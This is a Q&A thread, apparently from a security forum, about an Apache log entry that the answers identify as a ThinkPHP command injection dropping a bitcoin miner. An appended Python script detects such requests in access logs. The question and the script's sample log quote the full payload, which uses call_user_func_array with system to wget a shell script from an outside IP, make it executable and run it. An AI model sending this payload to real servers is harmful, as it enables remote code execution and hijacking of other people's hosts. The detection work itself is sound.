How to prevent users from executing commands through browser URL
I have very little experience with security (still learning); however, I was combing through my logs and noticed the following request:
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
Now, first of all, this made no sense to me, with the exception of chmod 777, which tells me someone was trying to change my file permissions.
My question is what kind of attack is this and what steps can I take to prevent it?
linux
asked 2 hours ago
user3718908
2 Answers
It's a command injection attack, in which:
the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
There are many strategies to mitigate or avoid this kind of attack; you can find some here, and have a look at this cheat sheet from OWASP.
answered 1 hour ago
Soufiane Tahiri
As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run, and then execute it.
The script in this case is a bitcoin miner.
The recommendations in the OWASP guide that Soufiane mentioned should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used, which will block requests like these before they reach your server process.
answered 1 hour ago
Veyf
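The answers above say what the request is; a defender's next step is to find out whether the same pattern appears elsewhere in the access logs. The following is an added example, not code from either answer: it parses combined-format log lines, percent-decodes the request target (repeatedly, so double-encoded variants are not missed), and flags requests that show the three traits of the line quoted in the question: the ThinkPHP dynamic-function invocation, a shell-executing PHP function named in vars[0], and a download-then-chmod chain. The sample log, the client IPs (documentation range) and the benign lines are constructed; the attack line reproduces the request from the question. A 2xx status with a response body does not prove the payload ran, but the example marks it for triage because the application did handle the request.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (combined format): line 1 carries the request quoted in
# the question, client IPs are made up (203.0.113.0/24), lines 2-3 are benign contrast.
SAMPLE_LOG = r'''203.0.113.7 - - [10/Mar/2019:10:12:01 +0000] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Mar/2019:10:12:05 +0000] "GET /index.php?s=/index/blog/view&id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2019:10:12:09 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is (name, regex) applied to the percent-decoded request target.
RULES = [
    ("thinkphp-invokefunction", re.compile(r"invokefunction|call_user_func_array", re.I)),
    ("php-shell-function-in-vars", re.compile(r"vars\[0\]=(system|exec|shell_exec|passthru|popen)\b", re.I)),
    ("download-and-execute", re.compile(r"\b(wget|curl)\b.*(;\s*chmod\b|/tmp/)", re.I)),
]

def decode_target(target: str) -> str:
    """Percent-decode until stable so double-encoded payloads do not slip past the rules."""
    prev = None
    while prev != target:
        prev, target = target, unquote_plus(target)
    return target

def analyze_log(text: str) -> list:
    """Return one finding per suspicious request: client ip, status, decoded target, matched rules."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on junk
        decoded = decode_target(m.group("target"))
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "target": decoded,
                "rules": hits,
                # 2xx means the app handled the request: treat the host as possibly
                # compromised until /tmp and the process list have been checked.
                "needs_triage": m.group("status").startswith("2"),
            })
    return findings
```

Run `analyze_log(open("/var/log/apache2/access.log").read())` (path assumed) to sweep a real log; every finding's `ip` is a candidate for blocking at the WAF or firewall, and every finding with `needs_triage` set warrants checking the host for the dropped file and a running miner.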